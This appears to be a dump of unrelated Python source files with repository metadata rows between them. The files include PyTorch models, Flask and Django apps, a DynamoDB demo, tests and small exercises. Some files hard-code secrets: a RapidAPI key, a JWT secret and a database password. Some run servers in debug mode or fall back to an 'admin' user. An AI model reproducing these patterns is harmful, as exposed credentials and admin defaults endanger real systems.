        self.decoder = nn.ConvTranspose1d(self.num_filter, self.num_filter, 3,1,padding=1)
        self.decoder1 = nn.ConvTranspose1d(self.num_filter, self.num_filter, 3,1,padding=1)
        self.decoder2 = nn.ConvTranspose1d(self.num_filter, 40, 3,1,padding=1)
        self.f2 = nn.Linear(self.num_filter, 6) # 6 classes
        self.f3 = nn.Linear(self.num_filter, TOTAL_NUM_SPKS)
        self.f4 = nn.Linear(self.num_filter, len(IMP_OVEC_FEAT))
        self.basic1 = BasicBlock(self.num_filter)
        self.basic2 = BasicBlock(self.num_filter)
        self.bn = nn.BatchNorm1d(40)  # not applied in forward (see commented line)
    def forward(self,x):
        # x = self.bn(x)
        enc = self.encoder(x)
        enc = nn.LeakyReLU()(enc)
        enc = self.encoder1(enc)
        enc = self.basic1(enc)
        enc = nn.LeakyReLU()(enc)
        enc = self.encoder2(enc)
        enc = nn.LeakyReLU()(enc)
        # print("enc.shape: ", enc.shape)
        dec = nn.LeakyReLU()(self.decoder(enc))
        dec = nn.LeakyReLU()(self.decoder1(dec))
        dec = self.basic2(dec)
        dec = nn.LeakyReLU()(self.decoder2(dec))
        # print("dec.shape: ", dec.shape)
        enc_permute = enc.permute(0,2,1)  # computed but unused
        # print("enc_permute.shape ", enc_permute.shape)
        # Global average pool over time -> (batch, num_filter).
        enc_pooled = F.avg_pool1d(enc, kernel_size=(enc.shape[2])).squeeze()
        out2 = nn.LeakyReLU()(self.f2(enc_pooled))
        out3 = nn.LeakyReLU()(self.f3(enc_pooled))
        out4 = nn.LeakyReLU()(self.f4(enc_pooled))
        # Returns (reconstruction, type logits, speaker logits, ovec regression).
        return dec, out2, out3, out4
class classification_model(nn.Module):
    """Three-conv 1-D encoder with global average pooling and a binary
    linear head. forward() returns (pooled embedding, logits)."""

    def __init__(self):
        super(classification_model, self).__init__()
        self.num_filter = 128
        # Submodule names and creation order are preserved so checkpoints
        # and seeded initialisation stay identical.
        self.encoder = nn.Conv1d(40, self.num_filter, 3, 1, bias=False, padding=1)
        self.encoder1 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1, groups=self.num_filter)
        self.encoder2 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False, padding=1, groups=self.num_filter)
        self.f1 = nn.Linear(128, 2) # 2 classes
        self.bn = nn.BatchNorm1d(40)  # defined but not applied in forward

    def forward(self, x):
        # x: (batch, 40, time) — presumably MFCC frames; confirm with caller.
        feats = F.leaky_relu(self.encoder(x))
        feats = F.leaky_relu(self.encoder1(feats))
        feats = F.leaky_relu(self.encoder2(feats))
        # Global average pooling over the time axis -> (batch, 128).
        pooled = F.avg_pool1d(feats, kernel_size=feats.shape[2]).squeeze()
        logits = self.f1(pooled)
        return pooled, logits
class OVEC_model(nn.Module):
    # Dual-purpose encoder: mode="ovec" regresses the IMP_OVEC_FEAT opensmile
    # features; mode="class" predicts 2-way class logits.
    def __init__(self, mode):
        super(OVEC_model, self).__init__()
        self.num_filter = 256
        self.inp_channel = 40 #40
        self.ovec_length = len(IMP_OVEC_FEAT)
        self.cnn1 = nn.Conv1d(self.inp_channel, self.num_filter, kernel_size=3, stride=1, bias=False, padding=1)
        # NOTE(review): cnn2/cnn3 have no padding, so each shortens the time
        # axis by 2 frames — confirm this is intended.
        self.cnn2 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False)
        self.cnn3 = nn.Conv1d(self.num_filter, self.num_filter, 3, 1, bias=False)
        self.f1 = nn.Linear(self.num_filter, self.ovec_length)
        self.f2 = nn.Linear(self.num_filter, 2)
        self.bn = nn.BatchNorm1d(self.num_filter)   # unused in forward
        self.bn1 = nn.BatchNorm1d(self.ovec_length) # unused in forward
        self.mode = mode
    def forward(self, x):
        enc = self.cnn1(x)
        enc = nn.LeakyReLU()(enc)
        enc = self.cnn2(enc)
        enc = nn.LeakyReLU()(enc)
        enc = self.cnn3(enc)
        enc = nn.LeakyReLU()(enc)
        enc_permute = enc.permute(0,2,1)  # computed but unused
        # Global average pool over time -> (batch, num_filter).
        enc_pooled = F.avg_pool1d(enc, kernel_size=(enc.shape[2])).squeeze()
        # enc_pooled = self.bn(enc_pooled)
        if self.mode == "ovec":
            # print(enc_pooled)
            out = self.f1(enc_pooled)
            # print(out)
            # out = self.bn1(out)
            # print(out)
            # exit()
        if self.mode == "class":
            out = self.f2(enc_pooled)
        # NOTE(review): an unrecognised mode leaves `out` unbound and raises
        # UnboundLocalError here.
        return out
from flask import Flask, render_template, request, redirect
import datetime
app=Flask(__name__)
# In-memory message store: contents are lost on every restart and are not
# shared between worker processes.
messages=[]
@app.route('/')
def index():
    # Render the board with every message posted so far.
    return render_template("index.html.jinja2", messages=messages)
@app.route('/post/add/', methods=['POST'])
def add_message():
    # Append the posted form field 'message' with a server-side timestamp,
    # then redirect back to the board (POST/redirect/GET).
    text = request.form.get('message')
    timestamp = datetime.datetime.now()
    messages.append({'text': text, 'timestamp': timestamp})
    return redirect('/')
if __name__ == "__main__":
    app.run(debug=True)
29277732322 | # QUESTION:
# In Hogwarts the currency is made up of galleon (G) and Sickle (s),
# and there are seven coins in general circulation:
# 1s, 5s, 10s, 25s, 50s, G1(100s), and G2(200s)
# It's possible to make G3.5 in the following way:
# 1xG2 +1xG1 + 4x10s +1x5s + 5x1s
# How many different ways can G3.5 be made using any number of coins?
# Using Dynamic Programming: Bottom Up Memoization
from typing import List
def count(coins: List[int], sum: int):
    """Count the distinct coin combinations of *coins* that add up to *sum*.

    Bottom-up dynamic programming over a single 1-D table: ``ways[i]`` holds
    the number of ways to make amount ``i`` using the coins processed so far.
    Iterating one coin at a time (outer loop) counts combinations rather than
    ordered sequences.

    Improvements over the original 2-D version: O(sum) memory instead of
    O(sum * n), and an empty coin list no longer raises IndexError — it
    simply yields 0 ways for any positive sum (and 1 way for sum == 0).
    """
    ways = [0] * (sum + 1)
    ways[0] = 1  # one way to make 0: take no coins
    for coin in coins:
        for amount in range(coin, sum + 1):
            ways[amount] += ways[amount - coin]
    return ways[sum]
# Hogwart coins as presented in the question
coins = [1, 5, 10, 25, 50, 100, 200]
sum = 350
print(f"There are {count(coins, sum)} ways to make {sum} using the following coins: {coins}") | krissukoco/hogwarts-coins | main.py | main.py | py | 1,525 | python | en | code | 0 | github-code | 36 |
25114962700 | from flask import Flask
from flask_restful import Resource, Api
from flask_jwt_extended import JWTManager
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from controler import *
app = Flask(__name__)
api = Api(app)
app.config['JWT_SECRET_KEY'] = 'qwejhfloimslvuywdkkvuhssss'
jwt = JWTManager(app)
engine = create_engine('postgresql://postgres:1234@localhost/db11', echo=True)
Base.metadata.create_all(engine)
Session = sessionmaker(bind=engine)
session = Session()
if __name__ == "__main__":
    # Routes are registered only under the main guard, so they exist solely
    # when this module is executed directly (not when imported, e.g. by a
    # WSGI server).
    # NOTE(review): '/user' is registered for AddUser, GetMyself and
    # UpdateUser — verify Flask-RESTful accepts these duplicate rules and
    # that each resource is actually reachable.
    api.add_resource(AddUser, '/user')
    api.add_resource(Login, '/login')
    api.add_resource(GetUser, '/user/<int:id>')
    api.add_resource(GetMyself, '/user')
    api.add_resource(UpdateUser, '/user')
    api.add_resource(AddBank, '/bank')
    api.add_resource(GetBank, '/bank/<int:id>')
    api.add_resource(AddCredit, '/user/credit')
    api.add_resource(UpdateCredit, '/user/credit/<int:credit_id>')
    api.add_resource(GetCredit, '/user/credit/<int:credit_id>')
    api.add_resource(AddTransaction, '/user/credit/<int:credit_id>/transaction')
    api.add_resource(GetTransaction, '/user/credit/<int:credit_id>/transaction/<int:transaction_id>')
    app.run(debug=True)
"""{
"username":"Vovik",
"first_name":"Vova",
"last_name":"Putin",
"phone":"09348124",
"email":"putin@gmail.com",
"password":"123"
}"""
'''
add bank
{
"all_money": 500000,
"per_cent" : 30
}
add user
{
"login": "mylogin",
"password": "my password",
"name": "myname",
"passport": "myUKRpasport",
"address": "Lviv",
"email": "user@gmail.com",
"phone_number": "88005553535"
"status": ""
}
add credit
{
"start_date": "21.01.2020",
"end_date": "21.01.2021",
"start_sum": 1000,
"current_sum": 100,
"bank_id": 1,
"user_id": 1
}
add transaction
{
"date": "17.12.2020",
"summ": 200
}
''' | VolodymyrVoloshyn02/PP | app.py | app.py | py | 1,882 | python | en | code | 0 | github-code | 36 |
1742330108 | import requests
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView
from .models import *
# Create your class-based views here.
@login_required()
def home(request):
    # Show only the fridge items owned by the logged-in user.
    fridge = Fridge.objects.filter(user=request.user)
    context = {
        'fridge': fridge,
    }
    return render(request, 'fridge/home.html', context)
class FridgeDetailView(DetailView):
    # Read-only detail page for a single fridge item.
    model = Fridge
# CREATE ITEM
class FridgeCreateView(LoginRequiredMixin, CreateView):
    model = Fridge
    fields = ['name', 'quantity']
    def form_valid(self, form):
        # Stamp the new item with the logged-in user before saving.
        form.instance.user = self.request.user
        return super().form_valid(form)
# UPDATE ITEM
class FridgeUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
    model = Fridge
    # After a successful update, send the user back to the fridge list.
    success_url = '/fridge'
    fields = ['name', 'quantity']
    def form_valid(self, form):
        form.instance.user = self.request.user
        return super().form_valid(form)
    def test_func(self):
        fridge_item = self.get_object()
        # Prevents users from updating other people's items.
        if self.request.user == fridge_item.user:
            return True
        return False
class FridgeDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
    model = Fridge
    # When successfully deleted, will take user back to homepage
    success_url = '/fridge'
    def test_func(self):
        fridge_item = self.get_object()
        # Prevents users from deleting other people's items.
        if self.request.user == fridge_item.user:
            return True
        return False
@login_required()
def recipe(request):
    # Fetch one random popular recipe from the Spoonacular API and render it.
    url = "https://spoonacular-recipe-food-nutrition-v1.p.rapidapi.com/recipes/random"
    querystring = {
        'number': 1,
        'veryPopular': True,
        'fillIngredients': True,
        'addRecipeInformation': True,
        'addRecipeNutrition': True
    }
    headers = {
        # SECURITY(review): this RapidAPI key is hard-coded and committed to
        # source control — move it to settings/an environment variable and
        # rotate the exposed key.
        'x-rapidapi-host': "spoonacular-recipe-food-nutrition-v1.p.rapidapi.com",
        'x-rapidapi-key': "f8540d734amsh0d72a908c3766d4p1be29fjsn28baee86ebe6"
    }
    res = requests.request("GET", url, headers=headers, params=querystring).json()['recipes']
    instructions = get_instructions(res[0]['analyzedInstructions'])
    ingredients = get_ingredients(res[0]['extendedIngredients'])
    context = {
        'title': res[0]['title'],
        'instructions': instructions,
        'ingredients': ingredients,
        'recipe_link': res[0]['sourceUrl'],
        'image_link': res[0]['image'],
    }
    print(res[0]['summary'])  # leftover debug output — consider removing
    return render(request, 'fridge/fridge_recipe.html', context)
def get_instructions(res: list) -> list:
    """Collect the 'step' text of every instruction in the first recipe."""
    return [entry['step'] for entry in res[0]['steps']]
def get_ingredients(res: list) -> list:
    """Collect the 'name' of every ingredient entry."""
    return [item['name'] for item in res]
| cysong12/COMP-2800-Team-DTC-14-Cominder | Apps/fridge/views.py | views.py | py | 3,201 | python | en | code | 0 | github-code | 36 |
23407025114 | # -*- coding: utf-8 -*-
"""
Department to Employee is One to Many.
解决方案:
有的时候 One to Many 对应的 Many 可能数量太多, 无法作为冗余跟 One 一起储存.
这时可以以 One.id 建立 Global Index.
问题:
由于 GSI 本质是另一个 DynamoDB Table, 只不过系统帮你自动维护了. 同样的 GSI 也会根据
hash key 做 partition 分散流量. 如果 One 这边的 entity 的数量不够多. 那么会导致 GSI
的流量不均衡.
"""
import os
import random
import string
import typing
import pynamodb
from pynamodb.attributes import UnicodeAttribute
from pynamodb.connection import Connection
from pynamodb.indexes import GlobalSecondaryIndex, KeysOnlyProjection
from pynamodb.models import Model
os.environ["AWS_DEFAULT_PROFILE"] = "eq_sanhe"
connection = Connection()
class DepartmentModel(Model):
    # The "one" side of the one-to-many relation: a department row keyed by
    # its id, with employees pointing back via EmployeeModel.department_id.
    class Meta:
        table_name = "one-to-many-department-2"
        region = "us-east-1"
        billing_mode = pynamodb.models.PAY_PER_REQUEST_BILLING_MODE
    department_id = UnicodeAttribute(hash_key=True)
    department_name = UnicodeAttribute()
    @classmethod
    def _create_one(cls, department_id, department_name):
        # Idempotent insert: only write when the id does not exist yet.
        try:
            cls.get(hash_key=department_id)
        except Model.DoesNotExist:
            cls(
                department_id=department_id,
                department_name=department_name,
            ).save()
    # @classmethod
    # def _find_employees(cls, department_id: str):
    #     employee_info_map: EmployeeInfoMap
    #     return [
    #         EmployeeModel(
    #             employee_id=employee_info_map.employee_id,
    #             employee_name=employee_info_map.employee_name,
    #         )
    #         for employee_info_map in cls.get(hash_key=department_id).employees
    #     ]
class DepartmentEmployeeIndex(GlobalSecondaryIndex):
    """GSI on EmployeeModel keyed by department_id, so employees of one
    department can be queried without scanning.

    Bug fixes: PynamoDB reads the index name from ``Meta.index_name``
    (``index`` was silently ignored, so the index got a derived name), and
    ``projection`` must be a Projection *instance*, not the class object.
    """
    class Meta:
        index_name = "one-to-many-department-employee-index-2"
        projection = KeysOnlyProjection()
    department_id = UnicodeAttribute(hash_key=True, null=True)
class EmployeeModel(Model):
    """
    A DynamoDB employee item; the "many" side of the relation, holding a
    department_id foreign key and a GSI over it.
    """
    class Meta:
        table_name = "one-to-many-employee-2"
        region = "us-east-1"
        billing_mode = pynamodb.models.PAY_PER_REQUEST_BILLING_MODE
    employee_id = UnicodeAttribute(hash_key=True)
    employee_name = UnicodeAttribute()
    department_id = UnicodeAttribute(null=True)
    department_index = DepartmentEmployeeIndex()
    @classmethod
    def _create_one(cls, employee_id, employee_name, department_id=None):
        # Idempotent insert: only write when the id does not exist yet.
        try:
            cls.get(hash_key=employee_id)
        except Model.DoesNotExist:
            cls(
                employee_id=employee_id,
                employee_name=employee_name,
                department_id=department_id,
            ).save()
    @classmethod
    def _assign_department(cls, employee_id, department_id: str):
        # Raises ValueError when the employee is already in that department.
        employee: EmployeeModel = cls.get(hash_key=employee_id)
        if employee.department_id == department_id:
            raise ValueError
        else:
            employee.update(
                actions=[
                    EmployeeModel.department_id.set(department_id)
                ]
            )
    @classmethod
    def _find_department(cls, employee_id: str) -> DepartmentModel:
        # Two sequential reads: employee first, then its department.
        return DepartmentModel.get(hash_key=cls.get(hash_key=employee_id).department_id)
DepartmentModel.create_table(wait=True)
EmployeeModel.create_table(wait=True)
class BusinessQuery:
    # Query helpers expressing business-level lookups on top of the models.
    @classmethod
    def find_employees_by_department(cls, department_id) -> typing.Iterable[EmployeeModel]:
        # Uses the department GSI, avoiding a full table scan.
        return EmployeeModel.department_index.query(department_id)
# --- Create Employee
def create_department():
    # Seed the two demo departments (idempotent).
    DepartmentModel._create_one(department_id="IT", department_name="Internet Technology")
    DepartmentModel._create_one(department_id="HR", department_name="Human Resource")
# create_department()
def create_employee():
    # Batch-write 1000 employees with random 8-letter names into random
    # departments. Not idempotent: re-running overwrites ids e-1..e-1000.
    def random_name():
        return "".join(random.sample(string.ascii_lowercase, 8))
    department_list = ["IT", "HR"]
    n_employee = 1000
    with EmployeeModel.batch_write() as batch:
        for i in range(1, 1 + n_employee):
            employee = EmployeeModel(
                employee_id=f"e-{i}",
                employee_name=random_name(),
                department_id=random.choice(department_list)
            )
            batch.save(employee)
# create_employee()
def find_employees():
    # Print every IT employee via the GSI and a final count.
    counter = 0
    for employee in BusinessQuery.find_employees_by_department(department_id="IT"):
        counter += 1
        print(employee.employee_id, employee.employee_name)
    print(f"total = {counter}")
find_employees()
def delete_all_tables():
    # Destructive: drops both demo tables.
    DepartmentModel.delete_table()
    EmployeeModel.delete_table()
# delete_all_tables()
| MacHu-GWU/Dev-Exp-Share | docs/source/01-AWS/01-All-AWS-Services-Root/21-Database/01-DynamoDB-Root/04-Dynamodb-Data-Modeling/principal/one-to-many/strategy2.py | strategy2.py | py | 4,760 | python | en | code | 3 | github-code | 36 |
70064841385 | import sqlite3
from database.API import db_actions
import json
class AllChannels():
    """Read-only accessor returning every row of the channels table."""

    def __init__(self):
        # Shared DB helper owning the sqlite cursor.
        self.DBActions = db_actions.DBOtherActions()

    def GetAllChannels(self):
        """Return all channels as a list of {id, name, type, number} dicts."""
        self.DBActions.cursor.execute('''
        SELECT * from channels;
        ''')
        return self.objectify_channel_output(self.DBActions.cursor.fetchall())

    def objectify_channel_output(self, output):
        # Fix: dropped the stray debug print(output) left in the original.
        # id/number are rendered as strings to match the JSON shape used by
        # SearchChannels.
        return [
            {
                "id": str(row[0]),
                "name": row[1],
                "type": row[2],
                "number": str(row[3])
            }
            for row in output
        ]
class SearchChannels():
    """Look up a single channel row by id and expose it as a dict."""

    def __init__(self, channel):
        # channel: the id to search for; bound as a SQL parameter below,
        # so no injection risk.
        self.channel = channel
        self.DBActions = db_actions.DBOtherActions()

    def searchChannel(self):
        """Return the channel dict for self.channel, or False when absent."""
        # Fix: dropped the stray debug print(self.channel).
        self.DBActions.cursor.execute('''
        SELECT * FROM channels
        WHERE id = ?;
        ''', (self.channel, ))
        try:
            # If the id exists, fetchall() yields at least one row.
            return self.objectify_channel_output(self.DBActions.cursor.fetchall()[0])
        except IndexError:
            return False

    def objectify_channel_output(self, output):
        # Fix: removed the commented-out json-string experiments; the
        # returned dict shape is unchanged.
        return {
            "id": str(output[0]),
            "name": output[1],
            "type": output[2],
            "number": str(output[3])
        }
72485218024 | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from . import views
from .apis import listings, users
from knox import views as knox_views
router = DefaultRouter()
router.register(r"users", users.UserViewSet, basename="users_api")
router.register(r"listings", listings.AuctionViewSet, basename="listings_api")
# Nested routes capture auction_id as a URL kwarg for the viewset.
# https://stackoverflow.com/questions/63439268/how-to-use-parameters-in-drf-router
router.register(r"listings/(?P<auction_id>\d+)/bids", listings.BidViewSet, basename="bids_api")
router.register(r"listings/(?P<auction_id>\d+)/comments", listings.CommentViewSet, basename="comments_api")
urlpatterns = [
    # Function-based watch/unwatch toggle for a listing.
    path("listings/<int:listing_id>/watch", listings.watch, name="watch_action"),
    # User (Knox) Routes
    path('', include(router.urls)),
    #path('users/<int:pk>/update', users.UserUpdateView.as_view()),
    #path('users/<int:pk>/deactivate', users.UserDeactivateView.as_view()),
    path('auth-api/', include('knox.urls')),
    path('logout', knox_views.LogoutView.as_view(), name="knox-logout"),
    path('register', users.RegisterView.as_view()),
    path('login', users.LoginView.as_view()),
]
42327126667 | """ There are many different ways of getting variables into your strings.
But the new f"" string beats them all (most of the time anyway).
"""
# Variables
age = 7
name = "Dean"
# All of the following strings will yield the same text - 'My name is Dean and I'm 7 years old.'
# They're just different ways of getting vatiables into the stings.
# BEFORE
text = "My name is " + name + " and I'm " + str(age) + " years old."
# OR MAYBE
text = "My name is {} and I'm {} years old.".format(name, age) # Notice no str() needed for age .format handles this.
# BUT NOW! (notice the 'f' before the start of the string - signifies this is a formatted string)
text = f"My name is {name} and I'm {age} years old." # So short, much wow.
| Honza-m/python-training | #python snippets/010 - New string formatting.py | 010 - New string formatting.py | py | 731 | python | en | code | 1 | github-code | 36 |
38221121523 | from itertools import permutations
def solution(k, dungeons):
    """Return the maximum number of dungeons clearable with fatigue *k*.

    Each dungeon is (required fatigue, fatigue cost). Brute-forces every
    visiting order; within an order, a dungeon whose requirement exceeds the
    remaining fatigue is skipped (later ones may still qualify).
    """
    best = 0
    for order in permutations(dungeons, len(dungeons)):
        fatigue = k
        cleared = 0
        for required, cost in order:
            if required <= fatigue:
                fatigue -= cost
                cleared += 1
        best = max(best, cleared)
    return best
| kh-min7/Programmers | 87946(피로도).py | 87946(피로도).py | py | 411 | python | en | code | 0 | github-code | 36 |
25650877857 | import sqlite3
from sqlite3 import Error
def create_connection(path):
    """Open a SQLite connection to *path*; print and return None on failure."""
    try:
        conn = sqlite3.connect(path)
    except Error as e:
        print(f"The error '{e}' occurred")
        return None
    print("Connection to SQLite DB successful")
    return conn
def connect_to_db():
    # Convenience wrapper: opens (or creates) the on-disk contacts database.
    return create_connection("contact_db.sqlite")
def execute_query(connection, query):
    """Run a single write/DDL statement and commit, printing the outcome."""
    cur = connection.cursor()
    try:
        cur.execute(query)
        connection.commit()
    except Error as e:
        print(f"The error '{e}' occurred")
    else:
        print("Query executed successfully")
def execute_read_query(connection, query):
    """Run a SELECT and return cursor.fetchall(); None when the query fails."""
    cur = connection.cursor()
    try:
        cur.execute(query)
        return cur.fetchall()
    except Error as e:
        print(f"The error '{e}' occurred")
        return None
def insert_query(email, subject, message):
    """Build an INSERT statement for the contacts table.

    Single quotes in the inputs are doubled (SQLite escaping) so quoted input
    can no longer break out of the literal or corrupt the statement.
    NOTE(review): a parameterized query (``VALUES (?, ?, ?)`` plus a params
    tuple) would be safer still; string building is kept only to preserve the
    ``execute_query(connection, query)`` call contract.
    """
    email, subject, message = (
        str(value).replace("'", "''") for value in (email, subject, message)
    )
    return f"INSERT INTO contacts (email, subject, message) VALUES ('{email}', '{subject}', '{message}');"
def read_query():
    """Return the SELECT statement fetching every contact row."""
    return "SELECT * from contacts"
if __name__ =="__main__":
connection = create_connection("contact_db.sqlite")
create_contacts_table = """
CREATE TABLE IF NOT EXISTS contacts (
id INTEGER PRIMARY KEY AUTOINCREMENT,
email TEXT NOT NULL,
subject TEXT,
message TEXT
);
"""
execute_query(connection, create_contacts_table)
# Insert_contact = """
# INSERT INTO
# contacts (email, subject, message)
# VALUES
# ('test@test.com', 'test', 'test1'),
# ('test@test.com', 'test', 'test2');
# """
# execute_query(connection, Insert_contact)
select_contacts = "SELECT * from contacts"
contacts = execute_read_query(connection, select_contacts)
for contact in contacts:
print(contact) | rezzco/portfo | shit.py | shit.py | py | 1,772 | python | en | code | 0 | github-code | 36 |
3853619553 | from Logger import Logger
from HTTPRequest import HTTPRequest
import urllib.request
class HTTPProxyRequest(HTTPRequest):
    """HTTPRequest routed through proxies from a shared proxy manager.

    read() rotates to a new proxy (retiring failed ones) until a fetch
    succeeds or retry_limit attempts are exhausted, returning the decoded
    body ('' on failure).
    """

    retry_limit = 5
    _response = None
    _proxy_manager = None

    @staticmethod
    def set_proxy_manager(proxy_manager):
        # Class-wide: one manager hands out / confirms / retires proxies
        # for every request instance.
        HTTPProxyRequest._proxy_manager = proxy_manager

    def read(self):
        # Bug fix: the original guard was `retry_limit is not int`, an
        # identity comparison against the *type* object int that is True for
        # every value — so the limit was reset to 5 on every call and could
        # never be customized. Validate the type with isinstance instead.
        if not isinstance(HTTPProxyRequest.retry_limit, int):
            HTTPProxyRequest.retry_limit = 5
        try_count = 0
        response = ''
        while True:
            if try_count == HTTPProxyRequest.retry_limit:
                Logger.error('Could not retrieve page {}'.format(self._url))
                break
            proxy = HTTPProxyRequest._proxy_manager.get_proxy()
            try:
                Logger.message('Making request using proxy: {}'.format(self._url))
                self.set_proxy(proxy, 'http')
                self._response = urllib.request.urlopen(self, timeout=10)
                response = self._response.read().decode('utf-8')
                # The proxy worked — report it back so the manager keeps it.
                HTTPProxyRequest._proxy_manager.confirm_proxy(proxy)
                break
            except Exception as e:
                Logger.error('Exception occurred while reading response for url {}, message: {}'.format(self._url, e))
                # Drop the failing proxy and retry with a fresh one.
                HTTPProxyRequest._proxy_manager.remove_proxy(proxy)
                try_count += 1
        return response
| dsypniewski/allegro-profile-crawler | HTTPProxyRequest.py | HTTPProxyRequest.py | py | 1,359 | python | en | code | 0 | github-code | 36 |
36627705399 | import numpy as np
import random
from snake_no_visual import LearnSnake
import pickle
class SnakeQAgent():
    # Tabular Q-learning agent for the LearnSnake environment. The Q-table is
    # indexed by a 12-dimensional binary state tuple plus one of 4 actions.
    def __init__(self):
        # define initial parameters
        self.discount_rate = 0.95
        self.learning_rate = 0.01
        self.eps = 1.0                  # exploration rate, decayed per episode
        self.eps_discount = 0.9992
        self.min_eps = 0.001
        self.num_episodes = 10000
        self.table = np.zeros((2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4))
        self.env = LearnSnake()
        self.score = []
        self.survived = []
    # epsilon-greedy action choice
    def get_action(self, state):
        # select random action (exploration)
        if random.random() < self.eps:
            return random.choice([0, 1, 2, 3])
        # select best action (exploitation)
        return np.argmax(self.table[state])
    def train(self):
        for i in range(1, self.num_episodes + 1):
            self.env = LearnSnake()
            steps_without_food = 0
            length = self.env.snake_length
            # print updates
            if i % 25 == 0:
                print(f"Episodes: {i}, score: {np.mean(self.score)}, survived: {np.mean(self.survived)}, eps: {self.eps}, lr: {self.learning_rate}")
                self.score = []
                self.survived = []
            # occasionally save latest model
            if (i < 500 and i % 10 == 0) or (i >= 500 and i < 1000 and i % 200 == 0) or (i >= 1000 and i % 500 == 0):
                with open(f'pickle/{i}.pickle', 'wb') as file:
                    pickle.dump(self.table, file)
            current_state = self.env.get_state()
            self.eps = max(self.eps * self.eps_discount, self.min_eps)
            done = False
            while not done:
                # choose action and take it
                action = self.get_action(current_state)
                new_state, reward, done = self.env.step(action)
                # Bellman Equation Update
                self.table[current_state][action] = (1 - self.learning_rate)\
                    * self.table[current_state][action] + self.learning_rate\
                    * (reward + self.discount_rate * max(self.table[new_state]))
                current_state = new_state
                steps_without_food += 1
                # Reset the starvation counter whenever the snake grows.
                if length != self.env.snake_length:
                    length = self.env.snake_length
                    steps_without_food = 0
                if steps_without_food == 1000:
                    # break out of loops
                    break
            # keep track of important metrics
            self.score.append(self.env.snake_length - 1)
            self.survived.append(self.env.survived)
| techtribeyt/snake-q-learning | snakeql.py | snakeql.py | py | 2,780 | python | en | code | 1 | github-code | 36 |
3896815670 | from datetime import timedelta
from pathlib import Path
import pytest
import htmap
from htmap.utils import timeout_to_seconds, wait_for_path_to_exist
def test_returns_when_path_does_exist():
    # This test file always exists, so the wait should return immediately.
    path = Path(__file__)
    wait_for_path_to_exist(path)
@pytest.mark.parametrize("timeout", [0, -1])
def test_timeout_on_nonexistent_path(timeout):
    # A zero/negative timeout on a missing path must raise immediately.
    path = Path("foo")
    with pytest.raises(htmap.exceptions.TimeoutError):
        wait_for_path_to_exist(path, timeout=timeout)
@pytest.mark.parametrize(
    "timeout, expected", [(1, 1.0), (0.1, 0.1), (timedelta(seconds=2.3), 2.3), (None, None),],
)
def test_timeout_to_seconds(timeout, expected):
    # ints/floats pass through as floats, timedeltas convert, None stays None.
    assert timeout_to_seconds(timeout) == expected
| htcondor/htmap | tests/unit/test_wait_for_path_to_exist.py | test_wait_for_path_to_exist.py | py | 706 | python | en | code | 29 | github-code | 36 |
19795245501 | import json
import sys
from django.conf import settings
from django.utils import translation
from adapter.utils import build_auth_args
# from adapter.utils.local import get_request
from blueapps.utils import get_request
def _clean_auth_info_uin(auth_info):
if "uin" in auth_info:
# 混合云uin去掉第一位
if auth_info["uin"].startswith("o"):
auth_info["uin"] = auth_info["uin"][1:]
return auth_info
def update_bkdata_auth_info(params):
    """
    Update the BK-Data platform authentication info carried in *params*.
    """
    if settings.FEATURE_TOGGLE.get("bkdata_token_auth", "off") == "on":
        # With bkdata token auth the auth method must be set; if the caller
        # already chose user auth, keep it.
        params["bkdata_authentication_method"] = params.get("bkdata_authentication_method") or "token"
        params["bkdata_data_token"] = settings.BKDATA_DATA_TOKEN
    else:
        # Otherwise fall back to user auth as the admin super user.
        params["bkdata_authentication_method"] = "user"
        params["bk_username"] = "admin"
        params["operator"] = "admin"
    return params
# Background and test tasks call ESB APIs without per-user permission checks.
if (
    "celery" in sys.argv
    or "shell" in sys.argv
    or ("runserver" not in sys.argv and sys.argv and "manage.py" in sys.argv[0])
):
    def add_esb_info_before_request(params):
        # No request/user context in background jobs: attach app credentials
        # and fall back to the "admin" super user.
        params["bk_app_code"] = settings.APP_CODE
        params["bk_app_secret"] = settings.SECRET_KEY
        params.setdefault("bkdata_authentication_method", "user")
        if "bk_username" not in params:
            params["bk_username"] = "admin"
        if "operator" not in params:
            params["operator"] = params["bk_username"]
        return params
    def add_esb_info_before_request_for_bkdata(params):
        # Same as above, then layer the BK-Data auth fields on top.
        params = add_esb_info_before_request(params)
        params = update_bkdata_auth_info(params)
        return params
# Functions used by normal web requests
else:
    # NOTE(review): add_esb_info_before_request_for_bkdata is only defined in
    # the background branch — verify web-request code never imports it.
    def add_esb_info_before_request(params):
        """
        Whether the current request is inspected is controlled via ``params``.
        @param {Boolean} [params.no_request] set it to skip reading the request
        """
        # normalized parameters
        params["bk_app_code"] = settings.APP_CODE
        params["bk_app_secret"] = settings.SECRET_KEY
        params["appenv"] = settings.RUN_VER
        if "no_request" in params and params["no_request"]:
            params["bk_username"] = "admin"
            params["operator"] = "admin"
        else:
            req = get_request()
            auth_info = build_auth_args(req)
            params.update(auth_info)
            if not params.get("auth_info"):
                auth_info = _clean_auth_info_uin(auth_info)
                params["auth_info"] = json.dumps(auth_info)
            params.update({"blueking_language": translation.get_language()})
            bk_username = req.user.bk_username if hasattr(req.user, "bk_username") else req.user.username
            if "bk_username" not in params:
                params["bk_username"] = bk_username
            if "operator" not in params:
                params["operator"] = bk_username
        # backward compatibility with the old API fields
        params["uin"] = params["bk_username"]
        params["app_code"] = settings.APP_CODE
        params["app_secret"] = settings.SECRET_KEY
        params.setdefault("bkdata_authentication_method", "user")
        return params
| robert871126/bk-chatbot | adapter/api/modules/utils.py | utils.py | py | 3,445 | python | en | code | null | github-code | 36 |
4430013923 | '''Given a generic tree, find and return the height of given tree.
Sample Input 1:
10 3 20 30 40 2 40 50 0 0 0 0
Sample Output 1:
3
'''
import sys
import queue
class TreeNode :
    # Node of a generic (n-ary) tree: a value plus an ordered child list.
    def __init__(self, data) :
        self.data = data
        self.children = list()
def inputLevelWise(li):
    """Build a generic tree from a level-order encoded list.

    The list starts with the root value and then, for each node in BFS
